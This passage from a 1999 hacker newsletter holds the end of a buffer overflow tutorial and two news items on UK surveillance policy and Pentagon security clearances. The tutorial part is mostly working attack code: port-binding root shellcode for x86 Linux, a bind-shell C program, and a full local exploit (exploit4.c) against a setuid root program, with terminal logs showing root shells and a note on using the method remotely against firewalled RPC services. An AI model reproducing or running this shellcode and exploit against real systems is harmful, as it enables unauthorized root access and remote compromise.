      Segmentation fault
      [ ohhara@ohhara ~ ] {5} $ ./exploit3 -500
      Jump to 0xbfffee5c
      bash# whoami
      root
      bash# pwd
      /home/ftp
      bash# cd /
      bash# pwd
      /
      bash# ls
      afs  boot  etc     home  lost+found  mnt   root  tmp  var
      bin  dev   export  lib   misc        proc  sbin  usr
      bash#
      ----------------------------------------------------------------------------
      
      5.5 What can you do with this technique?
       You cannot access root directory by attacking a chrooted setuid program with
      buffer overflow. However, you can access all directories with this technique.
       
      6 Open socket
       You can see the daemon crash if you try to overflow the buffer in a daemon.
      In many cases, you have to execute a shell, open a socket, and connect to
      your standard I/O. If you don't, you cannot get a shell. Even if you get a
      shell, the server crashes immediately, so you can't command anything. In this
      case, you have to make complex shellcode to connect to your standard I/O.
      
      6.1 The example vulnerable program
      
      ----------------------------------------------------------------------------
      #include<string.h>
      
      int main(int argc,char **argv)
      {
      char buffer[1024];
      if(argc>1)
      strcpy(buffer,argv[1]);
      }
      ----------------------------------------------------------------------------
      
       This is standard vulnerable program. I will use this for socket opening
      buffer overflow. Because I am too lazy to make a example daemon program. :)
      However, after you see the code, you will not be disappointed.
       
      6.2 Make open socket code
       If you can execute below code, you can open a socket.
      
      opensocketasm1.c
      ----------------------------------------------------------------------------
      #include<unistd.h>
      #include<sys/socket.h>
      #include<netinet/in.h>
      
      int soc,cli,soc_len;
      struct sockaddr_in serv_addr;
      struct sockaddr_in cli_addr;
      
      int main()
      {
      if(fork()==0)
      {
      serv_addr.sin_family=AF_INET;
      serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
      serv_addr.sin_port=htons(30464);
      soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
      bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));
      listen(soc,1);
      soc_len=sizeof(cli_addr);
      cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len);
      dup2(cli,0);
      dup2(cli,1);
      dup2(cli,2);
      execl("/bin/sh","sh",0);
      }
      }
      ----------------------------------------------------------------------------
      
       It's difficult to make with assembly language. You can make this program
      simple.
      
      opensocketasm2.c
      ----------------------------------------------------------------------------
      #include<unistd.h>
      #include<sys/socket.h>
      #include<netinet/in.h>
      
      int soc,cli;
      struct sockaddr_in serv_addr;
      
      int main()
      {
      if(fork()==0)
      {
      serv_addr.sin_family=2;
      serv_addr.sin_addr.s_addr=0;
      serv_addr.sin_port=0x77;
      soc=socket(2,1,6);
      bind(soc,(struct sockaddr *)&serv_addr,0x10);
      listen(soc,1);
      cli=accept(soc,0,0);
      dup2(cli,0);
      dup2(cli,1);
      dup2(cli,2);
      execl("/bin/sh","sh",0);
      }
      }
      ----------------------------------------------------------------------------
      
      compile and disassemble
      ----------------------------------------------------------------------------
      [ ohhara@ohhara ~ ] {1} $ gcc -o opensocketasm2 -static opensocketasm2.c
      [ ohhara@ohhara ~ ] {2} $ gdb opensocketasm2
      GNU gdb 4.17
      Copyright 1998 Free Software Foundation, Inc.
      GDB is free software, covered by the GNU General Public License, and you are
      welcome to change it and/or distribute copies of it under certain conditions.
      Type "show copying" to see the conditions.
      There is absolutely no warranty for GDB.  Type "show warranty" for details.
      This GDB was configured as "i386-redhat-linux"...
      (gdb) disassemble fork
      Dump of assembler code for function fork:
      0x804ca90 <fork>:       movl   $0x2,%eax
      0x804ca95 <fork+5>:     int    $0x80
      0x804ca97 <fork+7>:     cmpl   $0xfffff001,%eax
      0x804ca9c <fork+12>:    jae    0x804cdc0 <__syscall_error>
      0x804caa2 <fork+18>:    ret    
      0x804caa3 <fork+19>:    nop    
      0x804caa4 <fork+20>:    nop    
      0x804caa5 <fork+21>:    nop    
      0x804caa6 <fork+22>:    nop    
      0x804caa7 <fork+23>:    nop    
      0x804caa8 <fork+24>:    nop    
      0x804caa9 <fork+25>:    nop    
      0x804caaa <fork+26>:    nop    
      0x804caab <fork+27>:    nop    
      0x804caac <fork+28>:    nop    
      0x804caad <fork+29>:    nop    
      0x804caae <fork+30>:    nop    
      0x804caaf <fork+31>:    nop    
      End of assembler dump.
      (gdb) disassemble socket
      Dump of assembler code for function socket:
      0x804cda0 <socket>:     movl   %ebx,%edx
      0x804cda2 <socket+2>:   movl   $0x66,%eax
      0x804cda7 <socket+7>:   movl   $0x1,%ebx
      0x804cdac <socket+12>:  leal   0x4(%esp,1),%ecx
      0x804cdb0 <socket+16>:  int    $0x80
      0x804cdb2 <socket+18>:  movl   %edx,%ebx
      0x804cdb4 <socket+20>:  cmpl   $0xffffff83,%eax
      0x804cdb7 <socket+23>:  jae    0x804cdc0 <__syscall_error>
      0x804cdbd <socket+29>:  ret    
      0x804cdbe <socket+30>:  nop    
      0x804cdbf <socket+31>:  nop    
      End of assembler dump.
      (gdb) disassemble bind
      Dump of assembler code for function bind:
      0x804cd60 <bind>:       movl   %ebx,%edx
      0x804cd62 <bind+2>:     movl   $0x66,%eax
      0x804cd67 <bind+7>:     movl   $0x2,%ebx
      0x804cd6c <bind+12>:    leal   0x4(%esp,1),%ecx
      0x804cd70 <bind+16>:    int    $0x80
      0x804cd72 <bind+18>:    movl   %edx,%ebx
      0x804cd74 <bind+20>:    cmpl   $0xffffff83,%eax
      0x804cd77 <bind+23>:    jae    0x804cdc0 <__syscall_error>
      0x804cd7d <bind+29>:    ret    
      0x804cd7e <bind+30>:    nop    
      0x804cd7f <bind+31>:    nop    
      End of assembler dump.
      (gdb) disassemble listen
      Dump of assembler code for function listen:
      0x804cd80 <listen>:     movl   %ebx,%edx
      0x804cd82 <listen+2>:   movl   $0x66,%eax
      0x804cd87 <listen+7>:   movl   $0x4,%ebx
      0x804cd8c <listen+12>:  leal   0x4(%esp,1),%ecx
      0x804cd90 <listen+16>:  int    $0x80
      0x804cd92 <listen+18>:  movl   %edx,%ebx
      0x804cd94 <listen+20>:  cmpl   $0xffffff83,%eax
      0x804cd97 <listen+23>:  jae    0x804cdc0 <__syscall_error>
      0x804cd9d <listen+29>:  ret    
      0x804cd9e <listen+30>:  nop    
      0x804cd9f <listen+31>:  nop    
      End of assembler dump.
      (gdb) disassemble accept
      Dump of assembler code for function __accept:
      0x804cd40 <__accept>:   movl   %ebx,%edx
      0x804cd42 <__accept+2>: movl   $0x66,%eax
      0x804cd47 <__accept+7>: movl   $0x5,%ebx
      0x804cd4c <__accept+12>:        leal   0x4(%esp,1),%ecx
      0x804cd50 <__accept+16>:        int    $0x80
      0x804cd52 <__accept+18>:        movl   %edx,%ebx
      0x804cd54 <__accept+20>:        cmpl   $0xffffff83,%eax
      0x804cd57 <__accept+23>:        jae    0x804cdc0 <__syscall_error>
      0x804cd5d <__accept+29>:        ret    
      0x804cd5e <__accept+30>:        nop    
      0x804cd5f <__accept+31>:        nop    
      End of assembler dump.
      (gdb) disassemble dup2  
      Dump of assembler code for function dup2:
      0x804cbe0 <dup2>:       movl   %ebx,%edx
      0x804cbe2 <dup2+2>:     movl   0x8(%esp,1),%ecx
      0x804cbe6 <dup2+6>:     movl   0x4(%esp,1),%ebx
      0x804cbea <dup2+10>:    movl   $0x3f,%eax
      0x804cbef <dup2+15>:    int    $0x80
      0x804cbf1 <dup2+17>:    movl   %edx,%ebx
      0x804cbf3 <dup2+19>:    cmpl   $0xfffff001,%eax
      0x804cbf8 <dup2+24>:    jae    0x804cdc0 <__syscall_error>
      0x804cbfe <dup2+30>:    ret    
      0x804cbff <dup2+31>:    nop    
      End of assembler dump.
      (gdb)
      ----------------------------------------------------------------------------
      
      fork(); code
      ----------------------------------------------------------------------------
      char code[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      socket(2,1,6); code
      ----------------------------------------------------------------------------
      /* %ecx is a pointer of all arguments.                   */
      char code[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xf1"                      /* movl %esi,%ecx        */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      /* The first argument.                                   */
      /* %esi has reference free memory space before using     */
      /* this instruction.                                     */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      /* The second argument.                                  */
      "\xb0\x06"                      /* movb $0x6,%al         */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      /* The third argument.                                   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x01"                      /* movb $0x1,%bl         */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      bind(soc,(struct sockaddr *)&serv_addr,0x10); code
      ----------------------------------------------------------------------------
      /* %ecx is a pointer of all arguments.                   */
      char code[]=
      "\x89\xf1"                      /* movl %esi,%ecx        */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      /* %eax has to have soc value before using this          */
      /* instruction.                                          */
      /* the first argument.                                   */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
      /* serv_addr.sin_family=2                                */
      /* 2 is stored at 0xc(%esi).                             */
      "\xb0\x77"                      /* movb $0x77,%al        */
      "\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
      /* store port number at 0xe(%esi)                        */
      "\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
      /* %eax = the address of serv_addr                       */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      /* the second argument.                                  */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
      /* serv_addr.sin_addr.s_addr=0                           */
      /* 0 is stored at 0x10(%esi).                            */
      "\xb0\x10"                      /* movb $0x10,%al        */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      /* the third argument.                                   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x02"                      /* movb $0x2,%bl         */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      listen(soc,1); code
      ----------------------------------------------------------------------------
      /* %ecx is a pointer of all arguments.                   */
      char code[]=
      "\x89\xf1"                      /* movl %esi,%ecx        */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      /* %eax has to have soc value before using this          */
      /* instruction.                                          */
      /* the first argument.                                   */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      /* the second argument.                                  */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x04"                      /* movb $0x4,%bl         */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      accept(soc,0,0); code
      ----------------------------------------------------------------------------
      /* %ecx is a pointer of all arguments.                   */
      char code[]=
      "\x89\xf1"                      /* movl %esi,%ecx        */
      "\x89\xf1"                      /* movl %eax,(%esi)      */
      /* %eax has to have soc value before using this          */
      /* instruction.                                          */
      /* the first argument.                                   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      /* the second argument.                                  */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      /* the third argument.                                   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x05"                      /* movb $0x5,%bl         */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      dup2(cli,0); code
      ----------------------------------------------------------------------------
      /* the first argument is %ebx and the second argument    */
      /* is %ecx                                               */
      char code[]=
      /* %eax has to have cli value before using this          */
      /* instruction.                                          */
      "\x88\xc3"                      /* movb %al,%bl          */
      "\xb0\x3f"                      /* movb $0x3f,%al        */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      6.3 Modify the normal shellcode
      
       You need some works to merge the above codes.
      
      new shellcode
      ----------------------------------------------------------------------------
      char shellcode[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\xcd\x80"                      /* int $0x80             */
      "\x85\xc0"                      /* testl %eax,%eax       */
      "\x75\x43"                      /* jne 0x43              */
      /* fork()!=0 case                                        */
      /* It will call exit(0)                                  */
      /* To do that, it will jump twice, because exit(0) is    */
      /* located so far.                                       */
      "\xeb\x43"                      /* jmp 0x43              */
      /* fork()==0 case                                        */
      /* It will call -0xa5                                    */
      /* To do that, it will jump twice, because call -0xa5    */
      /* is located so far.                                    */
      "\x5e"                          /* popl %esi             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xf1"                      /* movl %esi,%ecx        */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\xb0\x06"                      /* movb $0x6,%al         */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x01"                      /* movb $0x1,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
      "\xb0\x77"                      /* movb $0x77,%al        */
      "\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
      "\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
      "\xb0\x10"                      /* movb $0x10,%al        */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x02"                      /* movb $0x2,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\xeb\x04"                      /* jmp 0x4               */
      "\xeb\x55"                      /* jmp 0x55              */
      "\xeb\x5b"                      /* jmp 0x5b              */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x04"                      /* movb $0x4,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x05"                      /* movb $0x5,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\x88\xc3"                      /* movb %al,%bl          */
      "\xb0\x3f"                      /* movb $0x3f,%al        */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\xcd\x80"                      /* int $0x80             */
      "\xb0\x3f"                      /* movb $0x3f,%al        */
      "\xb1\x01"                      /* movb $0x1,%cl         */
      "\xcd\x80"                      /* int $0x80             */
      "\xb0\x3f"                      /* movb $0x3f,%al        */
      "\xb1\x02"                      /* movb $0x2,%cl         */
      "\xcd\x80"                      /* int $0x80             */
      "\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax */
      /* %eax="/bin"                                           */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      "\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax */
      /* %eax="/sh/"                                           */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
      "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\x5b\xff\xff\xff";         /* call -0xa5            */
      ----------------------------------------------------------------------------
      
      6.4  Exploit vulnerable4 program
       With this shellcode, you can make an exploit code easily. And You have to
      make code which connects to the socket.
      
      exploit4.c
      ----------------------------------------------------------------------------
      #include<stdio.h>
      #include<stdlib.h>
      #include<unistd.h>
      #include<netdb.h>
      #include<netinet/in.h>
      
      #define ALIGN                             0
      #define OFFSET                            0
      #define RET_POSITION                   1024
      #define RANGE                            20
      #define NOP                            0x90
      
      char shellcode[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\xcd\x80"                      /* int $0x80             */
      "\x85\xc0"                      /* testl %eax,%eax       */
      "\x75\x43"                      /* jne 0x43              */
      "\xeb\x43"                      /* jmp 0x43              */
      "\x5e"                          /* popl %esi             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xf1"                      /* movl %esi,%ecx        */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\xb0\x06"                      /* movb $0x6,%al         */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x01"                      /* movb $0x1,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      "\xb0\x02"                      /* movb $0x2,%al         */
      "\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
      "\xb0\x77"                      /* movb $0x77,%al        */
      "\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
      "\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
      "\xb0\x10"                      /* movb $0x10,%al        */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x02"                      /* movb $0x2,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\xeb\x04"                      /* jmp 0x4               */
      "\xeb\x55"                      /* jmp 0x55              */
      "\xeb\x5b"                      /* jmp 0x5b              */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x04"                      /* movb $0x4,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\xb0\x66"                      /* movb $0x66,%al        */
      "\xb3\x05"                      /* movb $0x5,%bl         */
      "\xcd\x80"                      /* int $0x80             */
      "\x88\xc3"                      /* movb %al,%bl          */
      "\xb0\x3f"                      /* movb $0x3f,%al        */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\xcd\x80"                      /* int $0x80             */
      "\xb0\x3f"                      /* movb $0x3f,%al        */
      "\xb1\x01"                      /* movb $0x1,%cl         */
      "\xcd\x80"                      /* int $0x80             */
      "\xb0\x3f"                      /* movb $0x3f,%al        */
      "\xb1\x02"                      /* movb $0x2,%cl         */
      "\xcd\x80"                      /* int $0x80             */
      "\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax */
      "\x89\x06"                      /* movl %eax,(%esi)      */
      "\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax */
      "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
      "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\xb0\x01"                      /* movb $0x1,%al         */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\x5b\xff\xff\xff";         /* call -0xa5            */
      
      unsigned long get_sp(void)
      {
      __asm__("movl %esp,%eax");
      }
      
      long getip(char *name)
      {
      struct hostent *hp;
      long ip;
      if((ip=inet_addr(name))==-1)
      {
      if((hp=gethostbyname(name))==NULL)
      {
      fprintf(stderr,"Can't resolve host.\n");
      exit(0);
      }
      memcpy(&ip,(hp->h_addr),4);
      }
      return ip;
      }
      
      int exec_sh(int sockfd)
      {
      char snd[4096],rcv[4096];
      fd_set rset;
      while(1)
      {
      FD_ZERO(&rset);
      FD_SET(fileno(stdin),&rset);
      FD_SET(sockfd,&rset);
      select(255,&rset,NULL,NULL,NULL);
      if(FD_ISSET(fileno(stdin),&rset))
      {
      memset(snd,0,sizeof(snd));
      fgets(snd,sizeof(snd),stdin);
      write(sockfd,snd,strlen(snd));
      }
      if(FD_ISSET(sockfd,&rset))
      {
      memset(rcv,0,sizeof(rcv));
      if(read(sockfd,rcv,sizeof(rcv))<=0)
      exit(0);
      fputs(rcv,stdout);
      }
      }
      }
      
      int connect_sh(long ip)
      {
      int sockfd,i;
      struct sockaddr_in sin;
      printf("Connect to the shell\n");
      fflush(stdout);
      memset(&sin,0,sizeof(sin));
      sin.sin_family=AF_INET;
      sin.sin_port=htons(30464);
      sin.sin_addr.s_addr=ip;
      if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)
      {
      printf("Can't create socket\n");
      exit(0);
      }
      if(connect(sockfd,(struct sockaddr *)&sin,sizeof(sin))<0)
      {
      printf("Can't connect to the shell\n");
      exit(0);
      }
      return sockfd;
      }
      
      void main(int argc,char **argv)
      {
      char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
      long addr;
      unsigned long sp;
      int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
      int i;
      int sockfd;
      
      if(argc>1)
      offset=atoi(argv[1]);
      
      sp=get_sp();
      addr=sp-offset;
      
      for(i=0;i<bsize;i+=4)
      {
      buff[i+ALIGN]=(addr&0x000000ff);
      buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
      buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
      buff[i+ALIGN+3]=(addr&0xff000000)>>24;
      }
      
      for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
      buff[i]=NOP;
      
      ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
      for(i=0;i<strlen(shellcode);i++)
      *(ptr++)=shellcode[i];
      
      buff[bsize-1]='\0';
      
      printf("Jump to 0x%08x\n",addr);
      
      if(fork()==0)
      {
      execl("./vulnerable4","vulnerable4",buff,0);
      exit(0);
      }
      sleep(5);
      sockfd=connect_sh(getip("127.0.0.1"));
      exec_sh(sockfd);
      }
      ----------------------------------------------------------------------------
      
      exploit the vulnerable4 program
      ----------------------------------------------------------------------------
      [ ohhara@ohhara ~ ] {1} $ ls -l vulnerable4
      -rwsr-xr-x   1 root     root         4091 Oct 18 20:21 vulnerable4*
      [ ohhara@ohhara ~ ] {2} $ ls -l exploit4
      -rwxr-xr-x   1 ohhara   cse          7973 Oct 18 20:25 exploit4*
      [ ohhara@ohhara ~ ] {3} $ ./exploit4
      Jump to 0xbfffec64
      Connect to the shell
      Can't connect to the shell
      [ ohhara@ohhara ~ ] {4} $ ./exploit4 500
      Jump to 0xbfffea70
      Connect to the shell
      whoami
      root
      ----------------------------------------------------------------------------
      
      6.5 What can you do with this technique?
       You can make various remote exploit code with this technique. If the
      vulnerable host is behind the firewall, you can open a socket in unfiltered
      port. This is a very useful technique when you attack rpc service with buffer
      overflow.
      
      7. Summary
       This paper introduced four buffer overflow techniques. They are pass through
      filtering, change uid back to 0, break chroot, and open socket. These
      techniques will be very useful when you try to make a buffer overflow exploit
      code. In addition, these techniques can be combined.
       All programers MUST be careful when making a setuid root program or server
      program!!! PLEASE BE CAREFUL!!!!!
      
      8. References
       Smashing The Stack For Fun And Profit by Aleph1
       wu-ftpd remote exploit code by duke
       ADMmountd remote exploit code by ADM
      
      9. Etc
       Sorry for my poor English. :(
      
       Written by Taeho Oh ( ohhara@postech.edu )
      ----------------------------------------------------------------------------
      Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
      PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
      PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
      ----------------------------------------------------------------------------
      
      
                       ------------------------------------------
                       Special thanks to all of PLUS members. ^_^
                       ------------------------------------------
      
      
      
      -------------------------------------------------------------------------------
      -------------------------------------------------------------------------------
      -------------------------------------------------------------------------------
      
      @HWA                                                                                                                                             
      
35.0  UK Gov. Given Lifetime Menace Award 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by evilwench 
      Privacy International, a civil liberties group, has awarded
      the UK Government its "Lifetime Menace Award". The
      award was given for numerous privacy violations by the
      UK government. 

      CMP TechWeb       http://www.techweb.com/wire/story/TWB19991019S0007

      Privacy Group Boots U.K. Govt. For Net Spying       By Madeleine Acey, 
      TechWeb Oct 19, 1999 (10:41 AM) URL: 
      http://www.techweb.com/wire/story/TWB19991019S0007 

      Civil liberties group Privacy International singled out the British 
      government for criticism on Monday night at its annual Big Brother Awards 
      ceremony in London. Internal affairs department the Home Office won the 
      "Lifetime Menace Award" for what Privacy       International director 
      Simon Davies called a "litany of privacy violations."

      The London and Washington D.C.-based group highlighted the Home Office's 
      review of the Interception of Communications Act, which earlier this year 
      proposed to add Internet transmissions to other telecom traffic that could 
      be lawfully intercepted by law       enforcement agencies.

      The review caused controversy in the ISP community as it proposed 
      requiring ISPs and other communications service providers to provide 
      interception capability for law enforcement officials in real time at any 
      time.

      Along with curbs to the right to silence and the right to peaceful protest 
      in other legislation, and creating a national DNA database, Privacy 
      International also lambasted the department for opposing European Union 
      efforts to strengthen data protection regulations.

      David Omand, head of the Home Office, was not available to receive or 
      comment on the award, but Cambridge student Richard Makepeace -- 
      presenting the award for Privacy International -- delivered the 
      gold-colored cast of a boot crushing a man's head to a       
      representative at Omand's office. Makepeace said having the award received 
      at all was a major step forward for the civil liberties community -- even 
      though his accompanying cameraman was thrown out of the building. Last 
      year's Lifetime Menace Award recipient -- the Menwith Hill spy base in the 
      north of England run by the U.S. National Security Agency -- had him 
      arrested. 
      

      @HWA
      
36.0  DOD Sys Admins Need Top Secret Clearance 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by evilwench 
      The Pentagon will soon require top-secret security
      clearances for all system administrators. The Pentagon
      also will roll out a system of authentication for all the
      agency's computer users, according to the Department
      of Defense's chief information officer. (I feel sorry for all
      the Sys Admins that have to go through the mess of
      getting a Top Secret clearance. Just remember, the
      private sector awaits.) 

      GovExec.com       
      http://www.govexec.com/dailyfed/1099/101999b4.htm
      
      October 19, 1999

      DAILY BRIEFING
 
      Pentagon beefs up information
      security
 
      By Drew Clark, National Journal's Technology Daily
 
      Spurred by the rising threat of hacking attempts, the Pentagon is
      rethinking its approach to network security by requiring
      top-secret security clearances for all system administrators. 
 
      The Pentagon also will roll out a system of authentication for all
      the agency's computer users, according to the Department of
      Defense's chief information officer. 
 
      "The strength of the U.S. is its information technology. The
      weakness of the U.S. is its information technology," said Arthur
      Money, Defense Department CIO and senior civilian official in
      the Office of the Assistant Secretary of Defense. Money spoke
      Monday at the 22nd National Information Systems Security
      Conference sponsored by the National Institute of Standards and
      Technology and the National Security Agency. 
 
      Increasingly, information that is considered "sensitive" but not
      officially classified, such as hospital records, aircraft dispositions
      and research laboratory findings, has become a vulnerable part
      of the Defense Department's arsenal of information. That's
      because of the ability of outside computers to assemble snippets
      of apparently harmless material into a valuable dossier. 
 
      During testimony before a Senate committee earlier this month,
      Michael Vatis, the top official of the FBI's National Information
      Protection Center, said that the agency suspected Russian
      officials of attempting to break into such sensitive information in
      Defense Department computers. 
 
      Money said the recently disclosed "Moonlight Maze" hacking
      attempts on the Pentagon were far more sophisticated than the
      January 1998 attack known as "Solar Sunrise," which was later
      traced to several American teenager hackers exploiting known
      vulnerabilities in Defense Department computers. 
 
      "This is no longer hackers, but a state-sponsored attack," said
      Money. "Over a year, the severity and the frequency has
      increased dramatically." 
 
      While mandatory top-secret security clearances are designed to
      combat such problems, the Pentagon is instituting an extensive
      public-key infrastructure that will allow DoD to better track
      possible security breaches. 
 
      The PKI rollout, to be conducted in face-to-face sessions with
      computer users, will begin with a few hundred thousand military
      officials. But its scope will eventually expand to cover nearly 7
      million civilian and military personnel and contractors, Money
      said. He cited C.P. Snow, a British scientist who aided the
      country's military during World War II, who said: "Technology is
